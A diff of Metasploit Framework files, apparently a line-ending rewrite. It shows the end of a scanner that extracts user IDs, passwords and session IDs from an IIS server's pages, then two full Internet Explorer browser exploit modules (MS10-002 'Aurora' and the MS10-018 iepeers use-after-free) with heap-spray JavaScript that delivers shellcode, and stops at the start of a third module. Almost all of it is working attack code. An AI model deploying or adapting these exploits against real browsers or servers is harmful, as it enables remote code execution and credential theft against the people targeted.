+							reg_info = [ /<td>UserId<\/td><td>(\w+.*)<\/td>/, /<td>Password<\/td><td>(\w+.*)<\/td>/, 
+									 /<td>APPL_PHYSICAL_PATH<\/td><td>(\w+.*)<\/td>/,
+									 /<td>AspFilterSessionId<\/td><td>(\w+.*)<\/td>/,
+									 /<td>Via<\/td><td>(\w+.*)<\/td>/,/<td>LOCAL_ADDR<\/td><td>(\w+.*)<\/td>/, 
+									  /<td>ALL_RAW<\/td><td>((.+\n)+)<\/td>/
+							]									 
+							print_status ("DETAIL: #{turl}")
+							reg_info.each do |reg|
+								result = res.body.scan(reg).flatten.map{|s| s.strip}.uniq
+								str = result.to_s.chomp
+							
+							
+								if reg.to_s.include?"APPL_PHYSICAL_PATH"					
+									print_status ("Physical Path: #{str}")
+								elsif reg.to_s.include?"UserId"
+									print_status ("User ID: #{str}")
+								elsif reg.to_s.include?"Password"
+									print_status ("Password: #{str}")							
+								elsif reg.to_s.include?"AspFilterSessionId"
+									print_status ("Session ID: #{str}")
+								elsif reg.to_s.include?"LOCAL_ADDR"							
+									print_status ("Local Address: #{str}")
+								elsif result.include?"Via"
+									print_status ("VIA: #{str}")
+								elsif reg.to_s.include?"ALL_RAW"			
+									print_status ("Headers: #{str}")
+								end
+							end
+						end													
+					end				
+				end
+			end	
+			
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE
+		end
+	end
 end
\ No newline at end of file
diff --git a/modules/exploits/windows/browser/ms10_002_aurora.rb b/modules/exploits/windows/browser/ms10_002_aurora.rb
index c858a4f7b0..baa22e204c 100644
--- a/modules/exploits/windows/browser/ms10_002_aurora.rb
+++ b/modules/exploits/windows/browser/ms10_002_aurora.rb
@@ -1,161 +1,161 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = NormalRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-	include Msf::Exploit::Remote::BrowserAutopwn
-	autopwn_info({
-		:ua_name    => HttpClients::IE,
-		:ua_minver  => "6.0",
-		:ua_maxver  => "8.0",
-		:javascript => true,
-		:os_name    => OperatingSystems::WINDOWS,
-		:vuln_test  => nil, # no way to test without just trying it
-	})
-
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Internet Explorer "Aurora" Memory Corruption',
-			'Description'    => %q{
-				This module exploits a memory corruption flaw in Internet Explorer. This
-			flaw was found in the wild and was a key component of the "Operation Aurora"
-			attacks that lead to the compromise of a number of high profile companies. The
-			exploit code is a direct port of the public sample published to the Wepawet
-			malware analysis site. The technique used by this module is currently identical
-			to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         =>
-				[
-					'unknown',
-					'hdm'      # Metasploit port
-				],
-			'Version'        => '$Revision$',
-			'References'     =>
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({
+		:ua_name    => HttpClients::IE,
+		:ua_minver  => "6.0",
+		:ua_maxver  => "8.0",
+		:javascript => true,
+		:os_name    => OperatingSystems::WINDOWS,
+		:vuln_test  => nil, # no way to test without just trying it
+	})
+
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Internet Explorer "Aurora" Memory Corruption',
+			'Description'    => %q{
+				This module exploits a memory corruption flaw in Internet Explorer. This
+			flaw was found in the wild and was a key component of the "Operation Aurora"
+			attacks that lead to the compromise of a number of high profile companies. The
+			exploit code is a direct port of the public sample published to the Wepawet
+			malware analysis site. The technique used by this module is currently identical
+			to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
 				[
-					['MSB', 'MS10-002'],
-					['CVE', '2010-0249'],
-					['OSVDB', '61697'],
-					['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
-					['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
-
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-				},
-			'Payload'        =>
-				{
-					'Space'    => 1000,
-					'BadChars' => "\x00",
-					'Compat'   =>
-						{
-							'ConnectionType' => '-find',
-						},
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ 'Automatic', { }],
-				],
-			'DisclosureDate' => 'Jan 14 2009', # wepawet sample
-			'DefaultTarget'  => 0))
-	end
-
-	def on_request_uri(cli, request)
-
-		if (request.uri.match(/\.gif/i))
-			data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
-			send_response(cli, data, { 'Content-Type' => 'image/gif' })
-			return
-		end
-
-		var_boom       = rand_text_alpha(rand(100) + 1)
-
-		var_element    = rand_text_alpha(rand(100) + 1)
-		var_event      = rand_text_alpha(rand(100) + 1)
-		var_loaded     = rand_text_alpha(rand(100) + 1)
-		var_loaded_arg = rand_text_alpha(rand(100) + 1)
-
-		var_memory     = rand_text_alpha(rand(100) + 1)
-		var_spray      = rand_text_alpha(rand(100) + 1)
-		var_i          = rand_text_alpha(rand(100) + 1)
-
-		var_el_array   = rand_text_alpha(rand(100) + 1)
-		bleh           = rand_text_alpha(3);
-		var_grab_mem   = rand_text_alpha(rand(100) + 1)
-
-		var_unescape   = rand_text_alpha(rand(100) + 1)
-		var_shellcode  = rand_text_alpha(rand(100) + 1)
-
-		var_span_id    = rand_text_alpha(rand(100) + 1)
-		var_start      = rand_text_alpha(rand(100) + 1)
-		rand_html      = rand_text_english(rand(400) + 500)
-
-		html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
-<html>
-<head>
-<script>
-var #{var_element} = "COMMENT";
-var #{var_el_array} = new Array();
-for (i = 0; i < 1300; i++)
-{
-  #{var_el_array}[i] = document.createElement(#{var_element});
-  #{var_el_array}[i].data = "#{bleh}";
-}
-var #{var_event} = null;
-var #{var_memory} = new Array();
-var #{var_unescape} = unescape;
-function #{var_boom}()
-{
-  var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
-  var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
-  do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
-  for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
-}
-function #{var_loaded}(#{var_loaded_arg})
-{
-  #{var_boom}();
-  #{var_event} = document.createEventObject(#{var_loaded_arg});
-  document.getElementById("#{var_span_id}").innerHTML = "";
-  window.setInterval(#{var_grab_mem}, 50);
-}
-function #{var_grab_mem}()
-{
-  p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
-  for (i = 0; i < #{var_el_array}.length; i++)
-  {
-    #{var_el_array}[i].data = p;
-  }
-  var t = #{var_event}.srcElement;
-}
-</script>
-</head>
-<body>
-<span id="#{var_span_id}"><iframe src="#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
-</body>
-</html>|
-
-		print_status("Sending #{self.name} to client #{cli.peerhost}")
-		# Transmit the compressed response to the client
-		send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
-
-		# Handle the payload
-		handler(cli)
-	end
+					'unknown',
+					'hdm'      # Metasploit port
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					['MSB', 'MS10-002'],
+					['CVE', '2010-0249'],
+					['OSVDB', '61697'],
+					['URL', 'http://www.microsoft.com/technet/security/advisory/979352.mspx'],
+					['URL', 'http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js']
+
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 1000,
+					'BadChars' => "\x00",
+					'Compat'   =>
+						{
+							'ConnectionType' => '-find',
+						},
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Automatic', { }],
+				],
+			'DisclosureDate' => 'Jan 14 2009', # wepawet sample
+			'DefaultTarget'  => 0))
+	end
+
+	def on_request_uri(cli, request)
+
+		if (request.uri.match(/\.gif/i))
+			data = "R0lGODlhAQABAIAAAAAAAAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==".unpack("m*")[0]
+			send_response(cli, data, { 'Content-Type' => 'image/gif' })
+			return
+		end
+
+		var_boom       = rand_text_alpha(rand(100) + 1)
+
+		var_element    = rand_text_alpha(rand(100) + 1)
+		var_event      = rand_text_alpha(rand(100) + 1)
+		var_loaded     = rand_text_alpha(rand(100) + 1)
+		var_loaded_arg = rand_text_alpha(rand(100) + 1)
+
+		var_memory     = rand_text_alpha(rand(100) + 1)
+		var_spray      = rand_text_alpha(rand(100) + 1)
+		var_i          = rand_text_alpha(rand(100) + 1)
+
+		var_el_array   = rand_text_alpha(rand(100) + 1)
+		bleh           = rand_text_alpha(3);
+		var_grab_mem   = rand_text_alpha(rand(100) + 1)
+
+		var_unescape   = rand_text_alpha(rand(100) + 1)
+		var_shellcode  = rand_text_alpha(rand(100) + 1)
+
+		var_span_id    = rand_text_alpha(rand(100) + 1)
+		var_start      = rand_text_alpha(rand(100) + 1)
+		rand_html      = rand_text_english(rand(400) + 500)
+
+		html = %Q|<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
+<html>
+<head>
+<script>
+var #{var_element} = "COMMENT";
+var #{var_el_array} = new Array();
+for (i = 0; i < 1300; i++)
+{
+  #{var_el_array}[i] = document.createElement(#{var_element});
+  #{var_el_array}[i].data = "#{bleh}";
+}
+var #{var_event} = null;
+var #{var_memory} = new Array();
+var #{var_unescape} = unescape;
+function #{var_boom}()
+{
+  var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
+  var #{var_spray} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
+  do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );
+  for (#{var_i} = 0; #{var_i} < 150; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};
+}
+function #{var_loaded}(#{var_loaded_arg})
+{
+  #{var_boom}();
+  #{var_event} = document.createEventObject(#{var_loaded_arg});
+  document.getElementById("#{var_span_id}").innerHTML = "";
+  window.setInterval(#{var_grab_mem}, 50);
+}
+function #{var_grab_mem}()
+{
+  p = "\\u0c0f\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d\\u0c0d";
+  for (i = 0; i < #{var_el_array}.length; i++)
+  {
+    #{var_el_array}[i].data = p;
+  }
+  var t = #{var_event}.srcElement;
+}
+</script>
+</head>
+<body>
+<span id="#{var_span_id}"><iframe src="#{get_resource}#{var_start}.gif" onload="#{var_loaded}(event)" /></span></body></html>
+</body>
+</html>|
+
+		print_status("Sending #{self.name} to client #{cli.peerhost}")
+		# Transmit the compressed response to the client
+		send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
+
+		# Handle the payload
+		handler(cli)
+	end
 end
 
diff --git a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
index 332d4590df..e65ce5bd98 100644
--- a/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
+++ b/modules/exploits/windows/browser/ms10_018_ie_behaviors.rb
@@ -1,252 +1,252 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-##
-# originally ie_iepeers_pointer.rb
-#
-# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
-#
-# Tested successfully on the following platforms:
-#  - Microsoft Internet Explorer 7, Windows Vista SP2
-#  - Microsoft Internet Explorer 7, Windows XP SP3
-#  - Microsoft Internet Explorer 6, Windows XP SP3
-#
-# Exploit found in-the-wild. For additional details:
-# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
-#
-# Trancer
-# http://www.rec-sec.com
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = GoodRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Internet Explorer DHTML Behaviors Use After Free',
-			'Description'    => %q{
-					This module exploits a use-after-free vulnerability within the DHTML behaviors
-				functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
-				discovered being used in-the-wild and was previously known as the "iepeers"
-				vulnerability. The name comes from Microsoft's suggested workaround to block
-				access to the iepeers.dll file.
-
-				According to Nico Waisman, "The bug itself is when trying to persist an object
-				using the setAttribute, which end up calling VariantChangeTypeEx with both the
-				source and the destination being the same variant. So if you send as a variant
-				an IDISPATCH the algorithm will try to do a VariantClear of the destination before
-				using it. This will end up on a call to PlainRelease which deref the reference
-				and clean the object."
-
-				NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         =>
-				[
-					'unknown',                         # original discovery
-					'Trancer <mtrancer[at]gmail.com>', # metasploit module
-					'Nanika',                          # HIT2010 IE7 reliable PoC
-					'jduck'                            # minor cleanups
-				],
-			'Version'        => '$Revision$',
-			'References'     =>
-				[
-					[ 'CVE', '2010-0806' ],
-					[ 'OSVDB', '62810' ],
-					[ 'BID', '38615' ],
-					[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
-					[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
-					[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
-					[ 'MSB', 'MS10-018' ],
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'process',
-					'InitialAutoRunScript' => 'migrate -f',
-				},
-			'Payload'        =>
-				{
-					'Space'         => 1024,
-					'BadChars'      => "\x00\x09\x0a\x0d'\\",
-					'StackAdjustment' => -3500,
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
-						{
-							'Method' => 'automatic'
-						}
-					],
-
-					[ 'IE 6 SP0-SP2 (onclick)',
-						{
-							'Method' => 'onclick',
-							'Ret' => 0x0C0C0C0C
-						}
-					],
-
-					# "A great celebration of HIT2010" - http://www.hitcon.org/
-					[ 'IE 7.0 (marquee)',
-						{
-							'Method' => 'marquee',
-							'Ret' => 0x0C0C0C0C
-						}
-					],
-				],
-			'DisclosureDate' => 'Mar 09 2010',
-			'DefaultTarget'  => 0))
-	end
-
-
-	def auto_target(cli, request)
-		mytarget = nil
-
-		agent = request.headers['User-Agent']
-		#print_status("Checking user agent: #{agent}")
-		if agent =~ /Windows NT 6\.0/
-			mytarget = targets[2]   # IE7 on Vista
-		elsif agent =~ /MSIE 7\.0/
-			mytarget = targets[2]   # IE7 on XP and 2003
-		elsif agent =~ /MSIE 6\.0/
-			mytarget = targets[1]   # IE6 on NT, 2000, XP and 2003
-		else
-			print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
-		end
-
-		mytarget
-	end
-
-
-	def on_request_uri(cli, request)
-
-		if target['Method'] == 'automatic'
-			mytarget = auto_target(cli, request)
-			if (not mytarget)
-				send_not_found(cli)
-				return
-			end
-		else
-			mytarget = target
-		end
-
-		# Re-generate the payload
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
-
-		# Encode the shellcode
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
-
-		# Set the return\nops
-		ret  	    = Rex::Text.to_unescape([mytarget.ret].pack('V'))
-
-		# Randomize the javascript variable names
-		j_shellcode	 = rand_text_alpha(rand(100) + 1)
-		j_nops		 = rand_text_alpha(rand(100) + 1)
-		j_slackspace = rand_text_alpha(rand(100) + 1)
-		j_fillblock	 = rand_text_alpha(rand(100) + 1)
-		j_memory	    = rand_text_alpha(rand(100) + 1)
-		j_counter	 = rand_text_alpha(rand(30) + 2)
-		j_ret		    = rand_text_alpha(rand(100) + 1)
-		j_array		 = rand_text_alpha(rand(100) + 1)
-		j_function1	 = rand_text_alpha(rand(100) + 1)
-		j_function2	 = rand_text_alpha(rand(100) + 1)
-		j_object	    = rand_text_alpha(rand(100) + 1)
-		j_id		    = rand_text_alpha(rand(100) + 1)
-
-		# Construct the final page
-		case mytarget['Method']
-
-		when 'onclick'
-			html = %Q|<html><body>
-<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
-<script language='javascript'>
-function #{j_function1}(){
- var #{j_shellcode} = unescape('#{shellcode}');
- #{j_memory} = new Array();
- var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
- var #{j_nops} = unescape('#{ret}');
- while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
- var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
- delete #{j_nops};
- for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
-  #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
- }
-}
-function #{j_function2}(){
- #{j_function1}();
- var #{j_object} = document.createElement('body');
- #{j_object}.addBehavior('#default#userData');
- document.appendChild(#{j_object});
- try {
-  for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
-	#{j_object}.setAttribute('s',window);
-  }
- } catch(e){ }
- window.status+='';
-}
-
-document.getElementById('#{j_id}').onclick();
-</script></body></html>
-|
-
-		when 'marquee'
-			j_attrib = rand_text_alpha(6);
-			html = %Q|<html>
-<head>
-<style type="text/css">
-.#{j_object} {behavior: url(#default#userData);}
-</style>
-</head>
-<script>
-function #{j_function1}(){
- var #{j_shellcode} = unescape('#{shellcode}');
- #{j_memory} = new Array();
- var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
- var #{j_nops} = unescape('#{ret}');
- while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
- var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
- delete #{j_nops};
- for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
-  #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
- }
-}
-function #{j_function2}() {
- #{j_function1}();
- for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
-  #{j_id}.setAttribute("#{j_attrib}",document.location);
- }
- #{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
- document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
-}
-</script>
-<body onload="#{j_function2}();"></body>
-<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
-</html>
-|
-
-		end
-
-		# Transmit the compressed response to the client
-		send_response(cli, html, { 'Content-Type' => 'text/html' })
-
-		# Handle the payload
-		handler(cli)
-
-	end
-
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+##
+# originally ie_iepeers_pointer.rb
+#
+# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework
+#
+# Tested successfully on the following platforms:
+#  - Microsoft Internet Explorer 7, Windows Vista SP2
+#  - Microsoft Internet Explorer 7, Windows XP SP3
+#  - Microsoft Internet Explorer 6, Windows XP SP3
+#
+# Exploit found in-the-wild. For additional details:
+# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/
+#
+# Trancer
+# http://www.rec-sec.com
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GoodRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Internet Explorer DHTML Behaviors Use After Free',
+			'Description'    => %q{
+					This module exploits a use-after-free vulnerability within the DHTML behaviors
+				functionality of Microsoft Internet Explorer versions 6 and 7. This bug was
+				discovered being used in-the-wild and was previously known as the "iepeers"
+				vulnerability. The name comes from Microsoft's suggested workaround to block
+				access to the iepeers.dll file.
+
+				According to Nico Waisman, "The bug itself is when trying to persist an object
+				using the setAttribute, which end up calling VariantChangeTypeEx with both the
+				source and the destination being the same variant. So if you send as a variant
+				an IDISPATCH the algorithm will try to do a VariantClear of the destination before
+				using it. This will end up on a call to PlainRelease which deref the reference
+				and clean the object."
+
+				NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'unknown',                         # original discovery
+					'Trancer <mtrancer[at]gmail.com>', # metasploit module
+					'Nanika',                          # HIT2010 IE7 reliable PoC
+					'jduck'                            # minor cleanups
+				],
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2010-0806' ],
+					[ 'OSVDB', '62810' ],
+					[ 'BID', '38615' ],
+					[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],
+					[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ],
+					[ 'URL', 'http://eticanicomana.blogspot.com/2010/03/aleatory-persitent-threat.html' ],
+					[ 'MSB', 'MS10-018' ],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Payload'        =>
+				{
+					'Space'         => 1024,
+					'BadChars'      => "\x00\x09\x0a\x0d'\\",
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ '(Automatic) IE6, IE7 on Windows NT, 2000, XP, 2003 and Vista',
+						{
+							'Method' => 'automatic'
+						}
+					],
+
+					[ 'IE 6 SP0-SP2 (onclick)',
+						{
+							'Method' => 'onclick',
+							'Ret' => 0x0C0C0C0C
+						}
+					],
+
+					# "A great celebration of HIT2010" - http://www.hitcon.org/
+					[ 'IE 7.0 (marquee)',
+						{
+							'Method' => 'marquee',
+							'Ret' => 0x0C0C0C0C
+						}
+					],
+				],
+			'DisclosureDate' => 'Mar 09 2010',
+			'DefaultTarget'  => 0))
+	end
+
+
+	def auto_target(cli, request)
+		mytarget = nil
+
+		agent = request.headers['User-Agent']
+		#print_status("Checking user agent: #{agent}")
+		if agent =~ /Windows NT 6\.0/
+			mytarget = targets[2]   # IE7 on Vista
+		elsif agent =~ /MSIE 7\.0/
+			mytarget = targets[2]   # IE7 on XP and 2003
+		elsif agent =~ /MSIE 6\.0/
+			mytarget = targets[1]   # IE6 on NT, 2000, XP and 2003
+		else
+			print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
+		end
+
+		mytarget
+	end
+
+
+	def on_request_uri(cli, request)
+
+		if target['Method'] == 'automatic'
+			mytarget = auto_target(cli, request)
+			if (not mytarget)
+				send_not_found(cli)
+				return
+			end
+		else
+			mytarget = target
+		end
+
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})...")
+
+		# Encode the shellcode
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))
+
+		# Set the return\nops
+		ret  	    = Rex::Text.to_unescape([mytarget.ret].pack('V'))
+
+		# Randomize the javascript variable names
+		j_shellcode	 = rand_text_alpha(rand(100) + 1)
+		j_nops		 = rand_text_alpha(rand(100) + 1)
+		j_slackspace = rand_text_alpha(rand(100) + 1)
+		j_fillblock	 = rand_text_alpha(rand(100) + 1)
+		j_memory	    = rand_text_alpha(rand(100) + 1)
+		j_counter	 = rand_text_alpha(rand(30) + 2)
+		j_ret		    = rand_text_alpha(rand(100) + 1)
+		j_array		 = rand_text_alpha(rand(100) + 1)
+		j_function1	 = rand_text_alpha(rand(100) + 1)
+		j_function2	 = rand_text_alpha(rand(100) + 1)
+		j_object	    = rand_text_alpha(rand(100) + 1)
+		j_id		    = rand_text_alpha(rand(100) + 1)
+
+		# Construct the final page
+		case mytarget['Method']
+
+		when 'onclick'
+			html = %Q|<html><body>
+<button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button>
+<script language='javascript'>
+function #{j_function1}(){
+ var #{j_shellcode} = unescape('#{shellcode}');
+ #{j_memory} = new Array();
+ var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
+ var #{j_nops} = unescape('#{ret}');
+ while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
+ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
+ delete #{j_nops};
+ for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
+  #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
+ }
+}
+function #{j_function2}(){
+ #{j_function1}();
+ var #{j_object} = document.createElement('body');
+ #{j_object}.addBehavior('#default#userData');
+ document.appendChild(#{j_object});
+ try {
+  for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {
+	#{j_object}.setAttribute('s',window);
+  }
+ } catch(e){ }
+ window.status+='';
+}
+
+document.getElementById('#{j_id}').onclick();
+</script></body></html>
+|
+
+		when 'marquee'
+			j_attrib = rand_text_alpha(6);
+			html = %Q|<html>
+<head>
+<style type="text/css">
+.#{j_object} {behavior: url(#default#userData);}
+</style>
+</head>
+<script>
+function #{j_function1}(){
+ var #{j_shellcode} = unescape('#{shellcode}');
+ #{j_memory} = new Array();
+ var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);
+ var #{j_nops} = unescape('#{ret}');
+ while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }
+ var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);
+ delete #{j_nops};
+ for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {
+  #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};
+ }
+}
+function #{j_function2}() {
+ #{j_function1}();
+ for (#{j_counter} = 1; #{j_counter} <10; #{j_counter} ++ ){
+  #{j_id}.setAttribute("#{j_attrib}",document.location);
+ }
+ #{j_id}.setAttribute("#{j_attrib}",document.getElementsByName("style"));
+ document.location="about:\\u0c0c\\u0c0c\\u0c0c\\u0c0cblank";
+}
+</script>
+<body onload="#{j_function2}();"></body>
+<MARQUEE id="#{j_id}" class="#{j_object}"></MARQUEE>
+</html>
+|
+
+		end
+
+		# Transmit the compressed response to the client
+		send_response(cli, html, { 'Content-Type' => 'text/html' })
+
+		# Handle the payload
+		handler(cli)
+
+	end
+
 end
 
diff --git a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb
index 1e009218d0..23a423d092 100644
--- a/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb
+++ b/modules/exploits/windows/browser/ms10_018_ie_tabular_activex.rb
@@ -1,123 +1,123 @@
-##
-# $Id$
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/framework/
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
-	Rank = GoodRanking
-
-	include Msf::Exploit::Remote::HttpServer::HTML
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Internet Explorer Tabular Data Control ActiveX Memory Corruption',
